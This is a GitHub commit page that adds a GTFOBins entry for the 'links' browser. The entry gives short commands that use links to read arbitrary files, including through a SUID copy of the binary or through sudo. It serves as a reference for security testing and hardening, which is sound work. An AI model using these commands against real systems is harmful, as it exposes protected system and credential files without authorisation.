1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-05 23:26:06 +02:00

Create links

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Juampa Rodríguez 2024-04-10 22:46:01 +02:00 committed by GitHub
parent 4eca50ea16
commit 97f46f1526
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

16
_gtfobins/links.md Normal file
View File

@ -0,0 +1,16 @@
---
description: The result is displayed in a TUI interface.
functions:
file-read:
- code: |
LFILE=file_to_read
links "$LFILE"
suid:
- code: |
LFILE=file_to_read
./links "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo links "$LFILE"
---